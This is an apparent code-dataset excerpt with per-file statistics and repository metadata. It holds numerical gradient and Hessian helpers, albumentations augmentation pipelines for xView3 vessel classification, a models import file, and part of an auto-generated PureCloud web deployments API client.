    """ Numerical gradient of g_kin_ratio_vco_upper, returned as an (n, 1) column vector. """
    fun_wrapper = lambda x1: g_kin_ratio_vco_upper(x1, constants, variables)
    grad_fun = nda.Gradient(fun_wrapper)
    grad = grad_fun(x)
    # Consistency fix: reshape to match the other gradient helpers.
    return np.reshape(grad, (-1, 1))
# Hessians
def g3_vco_lower_hessian(x, constants, variables):
    """ Numerical Hessian of g3_vco_lower, returned as an (n, n) matrix. """
    fun_wrapper = lambda x1: g3_vco_lower(x1, constants, variables)
    hess_fun = nda.Hessian(fun_wrapper)
    hess = hess_fun(x)
    return hess


def g3_vco_upper_hessian(x, constants, variables):
    """ Numerical Hessian of g3_vco_upper, returned as an (n, n) matrix. """
    fun_wrapper = lambda x1: g3_vco_upper(x1, constants, variables)
    hess_fun = nda.Hessian(fun_wrapper)
    hess = hess_fun(x)
    return hess


def g4_vco_lower_hessian(x, constants, variables):
    """ Numerical Hessian of g4_vco_lower, returned as an (n, n) matrix. """
    fun_wrapper = lambda x1: g4_vco_lower(x1, constants, variables)
    hess_fun = nda.Hessian(fun_wrapper)
    hess = hess_fun(x)
    return hess


def g4_vco_upper_hessian(x, constants, variables):
    """ Numerical Hessian of g4_vco_upper, returned as an (n, n) matrix. """
    fun_wrapper = lambda x1: g4_vco_upper(x1, constants, variables)
    hess_fun = nda.Hessian(fun_wrapper)
    hess = hess_fun(x)
    return hess


def g5_vco_lower_hessian(x, constants, variables):
    """ Numerical Hessian of g5_vco_lower, returned as an (n, n) matrix. """
    fun_wrapper = lambda x1: g5_vco_lower(x1, constants, variables)
    hess_fun = nda.Hessian(fun_wrapper)
    hess = hess_fun(x)
    return hess


def g5_vco_upper_hessian(x, constants, variables):
    """ Numerical Hessian of g5_vco_upper, returned as an (n, n) matrix. """
    fun_wrapper = lambda x1: g5_vco_upper(x1, constants, variables)
    hess_fun = nda.Hessian(fun_wrapper)
    hess = hess_fun(x)
    return hess


def g6_vco_lower_hessian(x, constants, variables):
    """ Numerical Hessian of g6_vco_lower, returned as an (n, n) matrix. """
    fun_wrapper = lambda x1: g6_vco_lower(x1, constants, variables)
    hess_fun = nda.Hessian(fun_wrapper)
    hess = hess_fun(x)
    return hess


def g6_vco_upper_hessian(x, constants, variables):
    """ Numerical Hessian of g6_vco_upper, returned as an (n, n) matrix. """
    fun_wrapper = lambda x1: g6_vco_upper(x1, constants, variables)
    hess_fun = nda.Hessian(fun_wrapper)
    hess = hess_fun(x)
    return hess


def g_kin_ratio_vco_lower_hessian(x, constants, variables):
    """ Numerical Hessian of g_kin_ratio_vco_lower, returned as an (n, n) matrix. """
    fun_wrapper = lambda x1: g_kin_ratio_vco_lower(x1, constants, variables)
    hess_fun = nda.Hessian(fun_wrapper)
    hess = hess_fun(x)
    return hess


def g_kin_ratio_vco_upper_hessian(x, constants, variables):
    """ Numerical Hessian of g_kin_ratio_vco_upper, returned as an (n, n) matrix. """
    fun_wrapper = lambda x1: g_kin_ratio_vco_upper(x1, constants, variables)
    hess_fun = nda.Hessian(fun_wrapper)
    hess = hess_fun(x)
    return hess
| 34.045603
| 116
| 0.706946
| 1,614
| 10,452
| 4.343866
| 0.072491
| 0.12837
| 0.081301
| 0.062759
| 0.949365
| 0.926259
| 0.904293
| 0.895735
| 0.885751
| 0.885751
| 0
| 0.024299
| 0.20465
| 10,452
| 306
| 117
| 34.156863
| 0.819079
| 0.297742
| 0
| 0.707865
| 0
| 0
| 0.019718
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.168539
| false
| 0
| 0.011236
| 0
| 0.348315
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
5d3ff607d5b3958835bd47f3f3c2531f8a4e249f
| 14,953
|
py
|
Python
|
xd/xview3/vessel_class/augmentation.py
|
smly/xview3-kohei-solution
|
f6933ff437240c6c07fd61c3bd4290b639d17531
|
[
"MIT"
] | 2
|
2022-01-14T08:00:34.000Z
|
2022-01-17T12:42:44.000Z
|
xd/xview3/vessel_class/augmentation.py
|
smly/xview3-kohei-solution
|
f6933ff437240c6c07fd61c3bd4290b639d17531
|
[
"MIT"
] | null | null | null |
xd/xview3/vessel_class/augmentation.py
|
smly/xview3-kohei-solution
|
f6933ff437240c6c07fd61c3bd4290b639d17531
|
[
"MIT"
] | 1
|
2022-01-31T21:25:21.000Z
|
2022-01-31T21:25:21.000Z
|
import albumentations as albu
def get_xview3_augv3(**kwargs):
    """Return (train, val) albumentations pipelines; **kwargs accepted and ignored."""
    def _norm():
        # ImageNet statistics, applied to 8-bit inputs.
        return albu.Normalize(
            mean=(0.485, 0.456, 0.406),
            std=(0.229, 0.224, 0.225),
            max_pixel_value=255.0,
        )

    photometric = albu.OneOf(
        [
            albu.RandomBrightnessContrast(0.1, p=1),
            albu.RandomGamma(p=1),
        ],
        p=0.3,
    )
    free_rotate = albu.Rotate(
        p=0.3,
        limit=(-90, 90),
        interpolation=0,
        border_mode=0,
        value=(0, 0, 0),
        mask_value=None,
    )
    train_steps = [
        albu.RandomRotate90(p=0.3),
        albu.HorizontalFlip(p=0.3),
        photometric,
        free_rotate,
        _norm(),
    ]
    return albu.Compose(train_steps), albu.Compose([_norm()])
def get_xview3_augv3_centercrop64(**kwargs):
    """augv3 pipeline with a fixed 64x64 center crop in both train and val."""
    def _norm():
        # ImageNet statistics, applied to 8-bit inputs.
        return albu.Normalize(
            mean=(0.485, 0.456, 0.406),
            std=(0.229, 0.224, 0.225),
            max_pixel_value=255.0,
        )

    def _crop():
        return albu.CenterCrop(64, 64, p=1.0)

    train_steps = [albu.RandomRotate90(p=0.3), albu.HorizontalFlip(p=0.3)]
    train_steps.append(
        albu.OneOf(
            [
                albu.RandomBrightnessContrast(0.1, p=1),
                albu.RandomGamma(p=1),
            ],
            p=0.3,
        )
    )
    train_steps.append(
        albu.Rotate(
            p=0.3,
            limit=(-90, 90),
            interpolation=0,
            border_mode=0,
            value=(0, 0, 0),
            mask_value=None,
        )
    )
    train_steps.extend([_crop(), _norm()])
    return albu.Compose(train_steps), albu.Compose([_crop(), _norm()])
def get_xview3_augv3_centercrop92(**kwargs):
    """Return (train, val) albumentations pipelines; train crops 92x92."""
    train_transform = albu.Compose(
        [
            albu.RandomRotate90(p=0.3),
            albu.HorizontalFlip(p=0.3),
            albu.OneOf(
                [
                    albu.RandomBrightnessContrast(0.1, p=1),
                    albu.RandomGamma(p=1),
                ],
                p=0.3,
            ),
            albu.Rotate(
                p=0.3,
                limit=(-90, 90),
                interpolation=0,
                border_mode=0,
                value=(0, 0, 0),
                mask_value=None,
            ),
            albu.CenterCrop(92, 92, p=1.0),
            # ImageNet statistics applied to 8-bit inputs.
            albu.Normalize(
                mean=(0.485, 0.456, 0.406),
                std=(0.229, 0.224, 0.225),
                max_pixel_value=255.0,
            ),
        ]
    )
    val_transform = albu.Compose(
        [
            # NOTE(review): train crops to 92x92 but val crops to 64x64 —
            # looks like a copy-paste from the centercrop64 variant; confirm
            # whether val was meant to use 92x92 as well.
            albu.CenterCrop(64, 64, p=1.0),
            albu.Normalize(
                mean=(0.485, 0.456, 0.406),
                std=(0.229, 0.224, 0.225),
                max_pixel_value=255.0,
            ),
        ]
    )
    return train_transform, val_transform
def get_xview3_augv4_crop64(**kwargs):
    """augv3 pipeline plus 64x64 center crop and CoarseDropout during training."""
    def _norm():
        # ImageNet statistics, applied to 8-bit inputs.
        return albu.Normalize(
            mean=(0.485, 0.456, 0.406),
            std=(0.229, 0.224, 0.225),
            max_pixel_value=255.0,
        )

    def _crop():
        return albu.CenterCrop(64, 64, p=1.0)

    dropout = albu.CoarseDropout(
        p=0.3,
        min_holes=2,
        max_holes=6,
        max_height=6,
        max_width=6,
        min_height=2,
        min_width=2,
        mask_fill_value=0,
    )
    train = albu.Compose(
        [
            albu.RandomRotate90(p=0.3),
            albu.HorizontalFlip(p=0.3),
            albu.OneOf(
                [
                    albu.RandomBrightnessContrast(0.1, p=1),
                    albu.RandomGamma(p=1),
                ],
                p=0.3,
            ),
            albu.Rotate(
                p=0.3,
                limit=(-90, 90),
                interpolation=0,
                border_mode=0,
                value=(0, 0, 0),
                mask_value=None,
            ),
            _crop(),
            dropout,  # dropout runs after the crop in this variant
            _norm(),
        ]
    )
    val = albu.Compose([_crop(), _norm()])
    return train, val
def get_xview3_augv5_centercrop64(**kwargs):
    """Geometric-only training pipeline (no photometric jitter) with 64x64 crop."""
    def _norm():
        # ImageNet statistics, applied to 8-bit inputs.
        return albu.Normalize(
            mean=(0.485, 0.456, 0.406),
            std=(0.229, 0.224, 0.225),
            max_pixel_value=255.0,
        )

    def _crop():
        return albu.CenterCrop(64, 64, p=1.0)

    train = albu.Compose(
        [
            albu.RandomRotate90(p=0.3),
            albu.HorizontalFlip(p=0.3),
            # Unlike the augv3 family, the mask is padded with zeros here.
            albu.Rotate(
                p=0.3,
                limit=(-90, 90),
                interpolation=0,
                border_mode=0,
                value=(0, 0, 0),
                mask_value=(0, 0, 0),
            ),
            _crop(),
            _norm(),
        ]
    )
    return train, albu.Compose([_crop(), _norm()])
def augv6_crop128(**kwargs):
    """augv3 pipeline with 128x128 center crop and light CoarseDropout (p=0.1)."""
    def _norm():
        # ImageNet statistics, applied to 8-bit inputs.
        return albu.Normalize(
            mean=(0.485, 0.456, 0.406),
            std=(0.229, 0.224, 0.225),
            max_pixel_value=255.0,
        )

    def _crop():
        return albu.CenterCrop(128, 128, p=1.0)

    dropout = albu.CoarseDropout(
        p=0.1,
        min_holes=2,
        max_holes=6,
        max_height=12,
        max_width=12,
        min_height=4,
        min_width=4,
        mask_fill_value=0,
    )
    train = albu.Compose(
        [
            albu.RandomRotate90(p=0.3),
            albu.HorizontalFlip(p=0.3),
            albu.OneOf(
                [
                    albu.RandomBrightnessContrast(0.1, p=1),
                    albu.RandomGamma(p=1),
                ],
                p=0.3,
            ),
            albu.Rotate(
                p=0.3,
                limit=(-90, 90),
                interpolation=0,
                border_mode=0,
                value=(0, 0, 0),
                mask_value=None,
            ),
            _crop(),
            dropout,  # dropout runs after the crop in this variant
            _norm(),
        ]
    )
    return train, albu.Compose([_crop(), _norm()])
def augv7(**kwargs):
    """augv6-style training pipeline without any cropping (full tiles)."""
    def _norm():
        # ImageNet statistics, applied to 8-bit inputs.
        return albu.Normalize(
            mean=(0.485, 0.456, 0.406),
            std=(0.229, 0.224, 0.225),
            max_pixel_value=255.0,
        )

    dropout = albu.CoarseDropout(
        p=0.1,
        min_holes=2,
        max_holes=6,
        max_height=12,
        max_width=12,
        min_height=4,
        min_width=4,
        mask_fill_value=0,
    )
    train = albu.Compose(
        [
            albu.RandomRotate90(p=0.3),
            albu.HorizontalFlip(p=0.3),
            albu.OneOf(
                [
                    albu.RandomBrightnessContrast(0.1, p=1),
                    albu.RandomGamma(p=1),
                ],
                p=0.3,
            ),
            albu.Rotate(
                p=0.3,
                limit=(-90, 90),
                interpolation=0,
                border_mode=0,
                value=(0, 0, 0),
                mask_value=None,
            ),
            dropout,
            _norm(),
        ]
    )
    # Validation only normalizes; no crop is applied in this variant.
    return train, albu.Compose([_norm()])
def augv7_crop64(**kwargs):
    """augv7 pipeline followed by a 64x64 center crop (dropout BEFORE the crop)."""
    def _norm():
        # ImageNet statistics, applied to 8-bit inputs.
        return albu.Normalize(
            mean=(0.485, 0.456, 0.406),
            std=(0.229, 0.224, 0.225),
            max_pixel_value=255.0,
        )

    def _crop():
        return albu.CenterCrop(64, 64, p=1.0)

    dropout = albu.CoarseDropout(
        p=0.1,
        min_holes=2,
        max_holes=6,
        max_height=12,
        max_width=12,
        min_height=4,
        min_width=4,
        mask_fill_value=0,
    )
    train = albu.Compose(
        [
            albu.RandomRotate90(p=0.3),
            albu.HorizontalFlip(p=0.3),
            albu.OneOf(
                [
                    albu.RandomBrightnessContrast(0.1, p=1),
                    albu.RandomGamma(p=1),
                ],
                p=0.3,
            ),
            albu.Rotate(
                p=0.3,
                limit=(-90, 90),
                interpolation=0,
                border_mode=0,
                value=(0, 0, 0),
                mask_value=None,
            ),
            dropout,  # unlike augv4/augv6, dropout precedes the crop here
            _crop(),
            _norm(),
        ]
    )
    return train, albu.Compose([_crop(), _norm()])
def augv7_crop128(**kwargs):
    """augv7 pipeline followed by a 128x128 center crop (dropout BEFORE the crop)."""
    def _norm():
        # ImageNet statistics, applied to 8-bit inputs.
        return albu.Normalize(
            mean=(0.485, 0.456, 0.406),
            std=(0.229, 0.224, 0.225),
            max_pixel_value=255.0,
        )

    def _crop():
        return albu.CenterCrop(128, 128, p=1.0)

    dropout = albu.CoarseDropout(
        p=0.1,
        min_holes=2,
        max_holes=6,
        max_height=12,
        max_width=12,
        min_height=4,
        min_width=4,
        mask_fill_value=0,
    )
    train = albu.Compose(
        [
            albu.RandomRotate90(p=0.3),
            albu.HorizontalFlip(p=0.3),
            albu.OneOf(
                [
                    albu.RandomBrightnessContrast(0.1, p=1),
                    albu.RandomGamma(p=1),
                ],
                p=0.3,
            ),
            albu.Rotate(
                p=0.3,
                limit=(-90, 90),
                interpolation=0,
                border_mode=0,
                value=(0, 0, 0),
                mask_value=None,
            ),
            dropout,  # unlike augv4/augv6, dropout precedes the crop here
            _crop(),
            _norm(),
        ]
    )
    return train, albu.Compose([_crop(), _norm()])
def augv8_crop128(**kwargs):
    """Return (train, val) pipelines; train crops 128x128 then applies dropout."""
    train_transform = albu.Compose(
        [
            albu.RandomRotate90(p=0.3),
            albu.HorizontalFlip(p=0.3),
            albu.OneOf(
                [
                    albu.RandomBrightnessContrast(0.1, p=1),
                    albu.RandomGamma(p=1),
                ],
                p=0.3,
            ),
            albu.Rotate(
                p=0.3,
                limit=(-90, 90),
                interpolation=0,
                border_mode=0,
                value=(0, 0, 0),
                mask_value=None,
            ),
            albu.CenterCrop(128, 128, p=1.0),
            albu.CoarseDropout(
                p=0.1,
                min_holes=2,
                max_holes=6,
                max_height=12,
                max_width=12,
                min_height=4,
                min_width=4,
                mask_fill_value=0,
            ),
            # ImageNet statistics applied to 8-bit inputs.
            albu.Normalize(
                mean=(0.485, 0.456, 0.406),
                std=(0.229, 0.224, 0.225),
                max_pixel_value=255.0,
            ),
        ]
    )
    val_transform = albu.Compose(
        [
            # NOTE(review): validation crop is commented out while training
            # crops to 128x128 — possibly deliberate (evaluate on full tiles),
            # but confirm; sibling augv9_crop128 crops val as well.
            # albu.CenterCrop(128, 128, p=1.0),
            albu.Normalize(
                mean=(0.485, 0.456, 0.406),
                std=(0.229, 0.224, 0.225),
                max_pixel_value=255.0,
            ),
        ]
    )
    return train_transform, val_transform
def augv9_crop128(**kwargs):
    """augv3-style pipeline with 128x128 center crop and no dropout."""
    def _norm():
        # ImageNet statistics, applied to 8-bit inputs.
        return albu.Normalize(
            mean=(0.485, 0.456, 0.406),
            std=(0.229, 0.224, 0.225),
            max_pixel_value=255.0,
        )

    def _crop():
        return albu.CenterCrop(128, 128, p=1.0)

    train = albu.Compose(
        [
            albu.RandomRotate90(p=0.3),
            albu.HorizontalFlip(p=0.3),
            albu.OneOf(
                [
                    albu.RandomBrightnessContrast(0.1, p=1),
                    albu.RandomGamma(p=1),
                ],
                p=0.3,
            ),
            albu.Rotate(
                p=0.3,
                limit=(-90, 90),
                interpolation=0,
                border_mode=0,
                value=(0, 0, 0),
                mask_value=None,
            ),
            _crop(),
            _norm(),
        ]
    )
    return train, albu.Compose([_crop(), _norm()])
def augv10_crop128(**kwargs):
    """Minimal pipeline: 90-degree rotations, flips, photometric jitter, 128x128 crop."""
    def _norm():
        # ImageNet statistics, applied to 8-bit inputs.
        return albu.Normalize(
            mean=(0.485, 0.456, 0.406),
            std=(0.229, 0.224, 0.225),
            max_pixel_value=255.0,
        )

    def _crop():
        return albu.CenterCrop(128, 128, p=1.0)

    # No free-angle Rotate in this variant.
    train = albu.Compose(
        [
            albu.RandomRotate90(p=0.3),
            albu.HorizontalFlip(p=0.3),
            albu.OneOf(
                [
                    albu.RandomBrightnessContrast(0.1, p=1),
                    albu.RandomGamma(p=1),
                ],
                p=0.3,
            ),
            _crop(),
            _norm(),
        ]
    )
    return train, albu.Compose([_crop(), _norm()])
| 27.742115
| 60
| 0.397044
| 1,557
| 14,953
| 3.693642
| 0.044316
| 0.018084
| 0.024517
| 0.042601
| 0.978786
| 0.978786
| 0.978786
| 0.976178
| 0.971483
| 0.971483
| 0
| 0.156698
| 0.482311
| 14,953
| 538
| 61
| 27.79368
| 0.586229
| 0.011302
| 0
| 0.799607
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.023576
| false
| 0
| 0.001965
| 0
| 0.049116
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
5398d6e53e0ac2553fdeccfb76cf9a3d4c4dbfcf
| 136
|
py
|
Python
|
models/__init__.py
|
ZeroMove/classification_Tensorflow_Proj
|
d89bf3a999415c18f6ee3a1248ce7497b955b47f
|
[
"MIT"
] | 9
|
2019-08-15T06:29:43.000Z
|
2022-03-28T14:59:48.000Z
|
models/__init__.py
|
ZeroMove/classification_Tensorflow_Proj
|
d89bf3a999415c18f6ee3a1248ce7497b955b47f
|
[
"MIT"
] | null | null | null |
models/__init__.py
|
ZeroMove/classification_Tensorflow_Proj
|
d89bf3a999415c18f6ee3a1248ce7497b955b47f
|
[
"MIT"
] | 1
|
2019-08-20T01:42:26.000Z
|
2019-08-20T01:42:26.000Z
|
# -*-coding:utf-8-*-
from .simple_model import *
from .resnet_v1_50 import *
from .resnet_v1_101 import *
from .resnet_v1_152 import *
| 19.428571
| 28
| 0.735294
| 22
| 136
| 4.227273
| 0.545455
| 0.322581
| 0.516129
| 0.580645
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.102564
| 0.139706
| 136
| 6
| 29
| 22.666667
| 0.692308
| 0.132353
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
53c5608803cf8c236a6396203c395db13e97ccea
| 42,948
|
py
|
Python
|
build/PureCloudPlatformClientV2/apis/web_deployments_api.py
|
MyPureCloud/platform-client-sdk-python
|
51249f4c655a1c8a67561c9eaa852ef95e25e57d
|
[
"MIT"
] | 10
|
2019-02-22T00:27:08.000Z
|
2021-09-12T23:23:44.000Z
|
build/PureCloudPlatformClientV2/apis/web_deployments_api.py
|
MyPureCloud/platform-client-sdk-python
|
51249f4c655a1c8a67561c9eaa852ef95e25e57d
|
[
"MIT"
] | 5
|
2018-06-07T08:32:00.000Z
|
2021-07-28T17:37:26.000Z
|
build/PureCloudPlatformClientV2/apis/web_deployments_api.py
|
MyPureCloud/platform-client-sdk-python
|
51249f4c655a1c8a67561c9eaa852ef95e25e57d
|
[
"MIT"
] | 6
|
2020-04-09T17:43:07.000Z
|
2022-02-17T08:48:05.000Z
|
# coding: utf-8
"""
WebDeploymentsApi.py
Copyright 2016 SmartBear Software
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from __future__ import absolute_import
import sys
import os
import re
# python 2 and python 3 compatibility library
from six import iteritems
from ..configuration import Configuration
from ..api_client import ApiClient
class WebDeploymentsApi(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
config = Configuration()
if api_client:
self.api_client = api_client
else:
if not config.api_client:
config.api_client = ApiClient()
self.api_client = config.api_client
    def delete_webdeployments_configuration(self, configuration_id, **kwargs):
        """
        Delete all versions of a configuration
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please define a `callback` function
        to be invoked when receiving the response.
        >>> def callback_function(response):
        >>>     pprint(response)
        >>>
        >>> thread = api.delete_webdeployments_configuration(configuration_id, callback=callback_function)

        :param callback function: The callback function
            for asynchronous request. (optional)
        :param str configuration_id: The configuration ID (required)
        :return: None
            If the method is called asynchronously,
            returns the request thread.
        """
        # Declared parameters plus the reserved 'callback' kwarg.
        all_params = ['configuration_id']
        all_params.append('callback')

        params = locals()
        # Fail fast on any keyword argument not declared above.
        for key, val in iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method delete_webdeployments_configuration" % key
                )
            params[key] = val
        del params['kwargs']

        # verify the required parameter 'configuration_id' is set
        if ('configuration_id' not in params) or (params['configuration_id'] is None):
            raise ValueError("Missing the required parameter `configuration_id` when calling `delete_webdeployments_configuration`")

        resource_path = '/api/v2/webdeployments/configurations/{configurationId}'.replace('{format}', 'json')
        path_params = {}
        if 'configuration_id' in params:
            path_params['configurationId'] = params['configuration_id']

        query_params = {}

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None

        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.\
            select_header_accept(['application/json'])
        if not header_params['Accept']:
            del header_params['Accept']

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.\
            select_header_content_type(['application/json'])

        # Authentication setting
        auth_settings = ['PureCloud OAuth']

        response = self.api_client.call_api(resource_path, 'DELETE',
                                            path_params,
                                            query_params,
                                            header_params,
                                            body=body_params,
                                            post_params=form_params,
                                            files=local_var_files,
                                            response_type=None,
                                            auth_settings=auth_settings,
                                            callback=params.get('callback'))
        return response
    def delete_webdeployments_deployment(self, deployment_id, **kwargs):
        """
        Delete a deployment
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please define a `callback` function
        to be invoked when receiving the response.
        >>> def callback_function(response):
        >>>     pprint(response)
        >>>
        >>> thread = api.delete_webdeployments_deployment(deployment_id, callback=callback_function)

        :param callback function: The callback function
            for asynchronous request. (optional)
        :param str deployment_id: The deployment ID (required)
        :return: None
            If the method is called asynchronously,
            returns the request thread.
        """
        # Declared parameters plus the reserved 'callback' kwarg.
        all_params = ['deployment_id']
        all_params.append('callback')

        params = locals()
        # Fail fast on any keyword argument not declared above.
        for key, val in iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method delete_webdeployments_deployment" % key
                )
            params[key] = val
        del params['kwargs']

        # verify the required parameter 'deployment_id' is set
        if ('deployment_id' not in params) or (params['deployment_id'] is None):
            raise ValueError("Missing the required parameter `deployment_id` when calling `delete_webdeployments_deployment`")

        resource_path = '/api/v2/webdeployments/deployments/{deploymentId}'.replace('{format}', 'json')
        path_params = {}
        if 'deployment_id' in params:
            path_params['deploymentId'] = params['deployment_id']

        query_params = {}

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None

        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.\
            select_header_accept(['application/json'])
        if not header_params['Accept']:
            del header_params['Accept']

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.\
            select_header_content_type(['application/json'])

        # Authentication setting
        auth_settings = ['PureCloud OAuth']

        response = self.api_client.call_api(resource_path, 'DELETE',
                                            path_params,
                                            query_params,
                                            header_params,
                                            body=body_params,
                                            post_params=form_params,
                                            files=local_var_files,
                                            response_type=None,
                                            auth_settings=auth_settings,
                                            callback=params.get('callback'))
        return response
    def get_webdeployments_configuration_version(self, configuration_id, version_id, **kwargs):
        """
        Get a configuration version
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please define a `callback` function
        to be invoked when receiving the response.
        >>> def callback_function(response):
        >>>     pprint(response)
        >>>
        >>> thread = api.get_webdeployments_configuration_version(configuration_id, version_id, callback=callback_function)

        :param callback function: The callback function
            for asynchronous request. (optional)
        :param str configuration_id: The configuration ID (required)
        :param str version_id: The version of the configuration to get (required)
        :return: WebDeploymentConfigurationVersion
            If the method is called asynchronously,
            returns the request thread.
        """
        # Declared parameters plus the reserved 'callback' kwarg.
        all_params = ['configuration_id', 'version_id']
        all_params.append('callback')

        params = locals()
        # Fail fast on any keyword argument not declared above.
        for key, val in iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method get_webdeployments_configuration_version" % key
                )
            params[key] = val
        del params['kwargs']

        # verify the required parameter 'configuration_id' is set
        if ('configuration_id' not in params) or (params['configuration_id'] is None):
            raise ValueError("Missing the required parameter `configuration_id` when calling `get_webdeployments_configuration_version`")
        # verify the required parameter 'version_id' is set
        if ('version_id' not in params) or (params['version_id'] is None):
            raise ValueError("Missing the required parameter `version_id` when calling `get_webdeployments_configuration_version`")

        resource_path = '/api/v2/webdeployments/configurations/{configurationId}/versions/{versionId}'.replace('{format}', 'json')
        path_params = {}
        if 'configuration_id' in params:
            path_params['configurationId'] = params['configuration_id']
        if 'version_id' in params:
            path_params['versionId'] = params['version_id']

        query_params = {}

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None

        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.\
            select_header_accept(['application/json'])
        if not header_params['Accept']:
            del header_params['Accept']

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.\
            select_header_content_type(['application/json'])

        # Authentication setting
        auth_settings = ['PureCloud OAuth']

        response = self.api_client.call_api(resource_path, 'GET',
                                            path_params,
                                            query_params,
                                            header_params,
                                            body=body_params,
                                            post_params=form_params,
                                            files=local_var_files,
                                            response_type='WebDeploymentConfigurationVersion',
                                            auth_settings=auth_settings,
                                            callback=params.get('callback'))
        return response
    def get_webdeployments_configuration_versions(self, configuration_id, **kwargs):
        """
        Get the versions of a configuration
        This returns the 50 most recent versions for this configuration
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please define a `callback` function
        to be invoked when receiving the response.
        >>> def callback_function(response):
        >>>     pprint(response)
        >>>
        >>> thread = api.get_webdeployments_configuration_versions(configuration_id, callback=callback_function)

        :param callback function: The callback function
            for asynchronous request. (optional)
        :param str configuration_id: The configuration ID (required)
        :return: WebDeploymentConfigurationVersionEntityListing
            If the method is called asynchronously,
            returns the request thread.
        """
        # Declared parameters plus the reserved 'callback' kwarg.
        all_params = ['configuration_id']
        all_params.append('callback')

        params = locals()
        # Fail fast on any keyword argument not declared above.
        for key, val in iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method get_webdeployments_configuration_versions" % key
                )
            params[key] = val
        del params['kwargs']

        # verify the required parameter 'configuration_id' is set
        if ('configuration_id' not in params) or (params['configuration_id'] is None):
            raise ValueError("Missing the required parameter `configuration_id` when calling `get_webdeployments_configuration_versions`")

        resource_path = '/api/v2/webdeployments/configurations/{configurationId}/versions'.replace('{format}', 'json')
        path_params = {}
        if 'configuration_id' in params:
            path_params['configurationId'] = params['configuration_id']

        query_params = {}

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None

        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.\
            select_header_accept(['application/json'])
        if not header_params['Accept']:
            del header_params['Accept']

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.\
            select_header_content_type(['application/json'])

        # Authentication setting
        auth_settings = ['PureCloud OAuth']

        response = self.api_client.call_api(resource_path, 'GET',
                                            path_params,
                                            query_params,
                                            header_params,
                                            body=body_params,
                                            post_params=form_params,
                                            files=local_var_files,
                                            response_type='WebDeploymentConfigurationVersionEntityListing',
                                            auth_settings=auth_settings,
                                            callback=params.get('callback'))
        return response
    def get_webdeployments_configuration_versions_draft(self, configuration_id, **kwargs):
        """
        Get the configuration draft
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please define a `callback` function
        to be invoked when receiving the response.
        >>> def callback_function(response):
        >>>     pprint(response)
        >>>
        >>> thread = api.get_webdeployments_configuration_versions_draft(configuration_id, callback=callback_function)

        :param callback function: The callback function
            for asynchronous request. (optional)
        :param str configuration_id: The configuration ID (required)
        :return: WebDeploymentConfigurationVersion
            If the method is called asynchronously,
            returns the request thread.
        """
        # Declared parameters plus the reserved 'callback' kwarg.
        all_params = ['configuration_id']
        all_params.append('callback')

        params = locals()
        # Fail fast on any keyword argument not declared above.
        for key, val in iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method get_webdeployments_configuration_versions_draft" % key
                )
            params[key] = val
        del params['kwargs']

        # verify the required parameter 'configuration_id' is set
        if ('configuration_id' not in params) or (params['configuration_id'] is None):
            raise ValueError("Missing the required parameter `configuration_id` when calling `get_webdeployments_configuration_versions_draft`")

        resource_path = '/api/v2/webdeployments/configurations/{configurationId}/versions/draft'.replace('{format}', 'json')
        path_params = {}
        if 'configuration_id' in params:
            path_params['configurationId'] = params['configuration_id']

        query_params = {}

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None

